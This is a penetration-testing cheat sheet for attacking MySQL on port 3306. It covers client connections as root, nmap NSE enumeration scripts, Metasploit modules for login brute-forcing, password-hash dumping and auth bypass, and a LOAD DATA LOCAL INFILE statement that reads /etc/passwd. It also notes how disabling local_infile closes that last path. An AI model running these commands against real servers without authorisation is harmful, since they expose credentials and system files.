
Port 3306 - mysql

Connect

Install mysql client

# Debian/Ubuntu: default-mysql-client is the metapackage that pulls in the
# distribution's default MySQL-compatible command-line client.
sudo apt install default-mysql-client

Local

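# Connect to the server on this host as root.
# A bare --password makes the client prompt for the secret, so it does not end
# up in shell history or in the process list the way --password=<value> does.
mysql --user=root --password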

Remote

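# Connect to a remote server; "target" must hold its hostname or IP address.
# Use the quoted variable "${target}": $(target) is command substitution and
# would try to run a program called "target" instead of reading the variable.
# A bare --password prompts for the secret rather than exposing it in argv.
mysql -h "${target:?set target to the server host}" --user=root --password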

MySQL commands (run inside the mysql client)

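-- List the databases visible to the current account.
show databases;
-- Make <database-name> the default database for the statements that follow.
use <database-name>;
-- List the tables in the selected database.
show tables;
-- Return every row of <table-name>. The terminating semicolon is required,
-- otherwise the client keeps waiting for more input.
select * from <table-name>;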

Nmap

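# Service scan of the MySQL port; tee keeps a copy of the report in nmap.mysql.
#   -p3306  only the MySQL port      -Pn  skip host discovery
#   -sS     TCP SYN scan (needs raw-socket privileges, hence sudo)
#   -sC     default NSE scripts      -sV  service/version detection
# Use the quoted variable "${target}": $(target) is command substitution and
# would try to run a program called "target".
sudo nmap -p3306 -Pn -sS -sC -sV "${target:?set target to the host to scan}" | tee nmap.mysql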

Nmap - Script mysql-enum

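# Run a single NSE script (here mysql-enum) against the MySQL port.
# Use the quoted variable "${target}": $(target) is command substitution and
# would try to run a program called "target".
nmap -p3306 --script=mysql-enum "${target:?set target to the host to scan}"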
Other MySQL NSE scripts that can be given to --script:
  • mysql-audit
  • mysql-databases
  • mysql-dump-hashes
  • mysql-empty-password
  • mysql-enum
  • mysql-info
  • mysql-query
  • mysql-users
  • mysql-variables
  • mysql-vuln-cve2012-2122

Metasploit

use auxiliary/admin/mysql/mysql_sql
set USERNAME root
set PASSWORD password
set RHOST 10.10.125.83
run
Other MySQL modules (#Creds marks those that need valid credentials):
  • auxiliary/scanner/mysql/mysql_login
  • auxiliary/scanner/mysql/mysql_version
  • auxiliary/scanner/mysql/mysql_authbypass_hashdump
  • auxiliary/scanner/mysql/mysql_hashdump #Creds
  • auxiliary/admin/mysql/mysql_enum #Creds
  • auxiliary/scanner/mysql/mysql_schemadump #Creds
  • exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

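MySQL arbitrary file read via the client (LOAD DATA LOCAL INFILE)

LOAD DATA LOCAL reads the named file on the client host and sends it to the server, so whatever the client user can read can end up in a table. The statement is refused unless local_infile is enabled on both the server and the client; disabling it (local_infile=0 on the server, --local-infile=0 on the client) closes this path.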

mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';